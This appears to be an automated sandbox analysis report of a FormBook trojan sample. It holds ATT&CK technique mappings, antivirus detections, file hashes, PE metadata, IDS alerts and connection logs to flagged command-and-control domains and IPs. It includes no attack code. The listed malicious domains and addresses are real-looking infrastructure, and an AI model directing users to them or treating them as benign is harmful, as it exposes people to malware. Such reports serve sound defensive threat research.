          Source: Yara match; File source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Shared Modules | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 4 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 812 Process Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 12 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 21 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 13 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 812 Process Injection | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          [Behavior graph: ID 794399; Sample: file.exe; Startdate: 30/01/2023; Architecture: WINDOWS; Score: 100. Process nodes: file.exe (started), CasPol.exe (started), explorer.exe (injected), msiexec.exe (started).]

          Source | Detection | Scanner | Label
          file.exe | 62% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook
          file.exe | 51% | Virustotal |
          file.exe | 100% | Avira | HEUR/AGEN.1203876
          file.exe | 100% | Joe Sandbox ML |

          No Antivirus matches

          Source | Detection | Scanner | Label
          0.0.file.exe.f20000.0.unpack | 100% | Avira | HEUR/AGEN.1203876
          2.2.CasPol.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Source | Detection | Scanner | Label
          hvlandscapes.biz | 1% | Virustotal |
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.popcors.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.hayuterce.com/crhz/explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=30q5648k6.4.drfalse
                                                  high
                                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search30q5648k6.4.drfalse
                                                    high
                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=msiexec.exe, 00000004.00000002.516527589.0000000007080000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.4.drfalse
                                                      high
                                                      http://www.wenzid4.top/crhz/explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://search.yahoo.com?fr=main_sfpfmsiexec.exe, 00000004.00000002.516527589.0000000007080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ac.ecosia.org/autocomplete?q=30q5648k6.4.drfalse
                                                          high
                                                          https://search.yahoo.com?fr=crmas_sfp30q5648k6.4.drfalse
                                                            high
                                                            http://www.sandpiper-apts.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.tf8dangky.onlineexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://search.yahoo.com/searchmsiexec.exe, 00000004.00000002.516527589.0000000007080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.nortonseecurity.com/crhz/explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.nftspaceview.com~bm1explorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              http://www.teammart.onlineqexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.thepromotionhunter.com/crhz/explorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.wylvxing.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.nftspaceview.com/crhz/explorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=30q5648k6.4.drfalse
                                                                high
                                                                http://www.hvlandscapes.bizexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.laylaroseuk.com/crhz/explorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://www.nortonseecurity.comexplorer.exe, 00000003.00000002.528793912.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.463111610.000000000F522000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.461505626.000000000F51B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 185.151.199.52 | www.n-r-eng.com | Israel | 12400 | PARTNER-ASIL | true |
| 18.138.206.213 | ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com | United States | 16509 | AMAZON-02US | false |
| 81.169.145.72 | frogair.online | Germany | 6724 | STRATOSTRATOAGDE | true |
| 76.223.105.230 | hvlandscapes.biz | United States | 16509 | AMAZON-02US | true |
| 164.88.201.214 | www.sandpiper-apts.com | South Africa | 137951 | CLAYERLIMITED-AS-APClayerLimitedHK | true |
| 103.221.223.104 | www.suachuadienlanh247.com | Viet Nam | 18403 | FPT-AS-APTheCorporationforFinancingPromotingTechnolo | true |
| 163.44.198.50 | cname.u01.df.bkk1.cloud.z.com | Singapore | 135161 | GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | false |
| 2.57.90.16 | laylaroseuk.com | Lithuania | 47583 | AS-HOSTINGERLT | true |
| 184.94.215.91 | www.teammart.online | United States | 394896 | VXCHNGE-NC01US | true |
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 794399
Start date and time: 2023-01-30 14:50:38 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@9/9
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 54.5% (good quality ratio 47.8%)
• Quality average: 69.9%
• Quality standard deviation: 33.6%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 105
• Number of non-executed functions: 92
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 14:51:33 | API Interceptor | 1x Sleep call for process: file.exe modified |
| 14:51:54 | API Interceptor | 799x Sleep call for process: explorer.exe modified |
                                                                • 2.52.115.228
                                                                0ZWx91rasR.elfGet hashmaliciousBrowse
                                                                • 2.53.105.148
                                                                PSlc8imSQa.elfGet hashmaliciousBrowse
                                                                • 2.53.79.31
                                                                sora.arm.elfGet hashmaliciousBrowse
                                                                • 2.55.156.150
                                                                soI8yStlNX.elfGet hashmaliciousBrowse
                                                                • 2.55.156.148
                                                                3PFX5qTLd5.elfGet hashmaliciousBrowse
                                                                • 176.228.155.129
                                                                ascaris.x86_64.elfGet hashmaliciousBrowse
                                                                • 176.228.107.202
                                                                No context
                                                                No context
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):226
                                                                Entropy (8bit):5.3467126928258955
                                                                Encrypted:false
                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                Category:dropped
                                                                Size (bytes):94208
                                                                Entropy (8bit):1.2891393435168748
                                                                Encrypted:false
                                                                SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                Malicious:false
                                                                Reputation:unknown
Preview:SQLite format 3......@ .......-...........=......................................................[5...........*...
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.947521655611989
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:file.exe
                                                                File size:615936
                                                                MD5:02df8c86345d056735fa60116b93ed2b
                                                                SHA1:70294e9e09c8d9d895599b73d1091c4013aee691
                                                                SHA256:c7627adc0797d3315c2c942356c8cb1fca39afbd0335512236be79a6e2f7acb3
                                                                SHA512:02a16ffda407d61663e2cbc8fe2d4699528aa439e5899b773484c197a823d414da197b0a6e4aa18ff962e12e7268bdd358399d58502700e262cbb7201ee549a6
                                                                SSDEEP:12288:OCF4GQWsWKKlWr2LD1WpN8Vm62Mum/sxMjp2ilM:Oi4GQWs0LpW0m62IsaJW
                                                                TLSH:7AD41202A6235703D425557180FB452113F6FFCBB633C35AEF89F3A4AA113ABAE55782
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................X..........nw... ........@.. ....................................`................................
                                                                Icon Hash:00828e8e8686b000
                                                                Entrypoint:0x49776e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0xC2A5F7A7 [Sun Jun 25 22:52:23 2073 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x97720          0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x9a000          0x588         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x9c000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x976e2          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x95774       0x95800   False     0.9615335623954849   data       7.9572107240717935   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata  0x98000          0x1e8         0x200     False     0.861328125          data       6.620478097886401    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x9a000          0x588         0x600     False     0.4166666666666667   data       4.041329299267579    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x9c000          0xc           0x200     False     0.044921875          data       0.09800417566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                               Language  Country
RT_VERSION   0x9a0a0  0x2fc  data
RT_MANIFEST  0x9a39c  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                 Source Port  Dest Port  Source IP    Dest IP
01/30/23-14:52:54.016726  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)    49729        80         192.168.2.6  184.94.215.91
01/30/23-14:52:54.016726  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)    49729        80         192.168.2.6  184.94.215.91
01/30/23-14:52:54.016726  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)    49729        80         192.168.2.6  184.94.215.91
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                Jan 30, 2023 14:52:40.100408077 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:40.297971010 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.298177004 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:40.298743963 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:40.495136976 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.495173931 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.495204926 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.495225906 CET804972418.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:40.495290041 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:41.802678108 CET4972480192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:42.819000006 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.021802902 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:43.022082090 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.022285938 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.224601984 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:43.224649906 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:43.224672079 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:43.224827051 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.225006104 CET4972580192.168.2.618.138.206.213
                                                                Jan 30, 2023 14:52:43.428596020 CET804972518.138.206.213192.168.2.6
                                                                Jan 30, 2023 14:52:48.277234077 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:48.449347019 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.449539900 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:48.450901985 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:48.623519897 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741343975 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741385937 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741414070 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741441965 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741463900 CET8049727184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:48.741514921 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:48.741554976 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:50.120781898 CET4972780192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.132191896 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.303395033 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.303572893 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.304053068 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.472388029 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.472587109 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.578947067 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.578978062 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.578998089 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.579137087 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.579138994 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.579185963 CET8049728184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:51.579230070 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:51.579277992 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:52.819386005 CET4972880192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:53.835388899 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.006603003 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.006794930 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.016726017 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.187874079 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282556057 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282608986 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282660961 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282712936 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282764912 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282900095 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.282973051 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.283251047 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.454081059 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:59.408248901 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:52:59.706686974 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:52:59.706819057 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:52:59.707041025 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.005126953 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.332551956 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.332595110 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.332622051 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.332743883 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.340389013 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.340432882 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.340557098 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.353301048 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.353323936 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.353461981 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.376853943 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.376912117 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.377074957 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.382388115 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.383605957 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.631855011 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.631886959 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.632065058 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:01.210660934 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:02.226944923 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:02.525616884 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:02.525881052 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:02.526284933 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:02.826761007 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.089288950 CET8049731103.221.223.104192.168.2.6
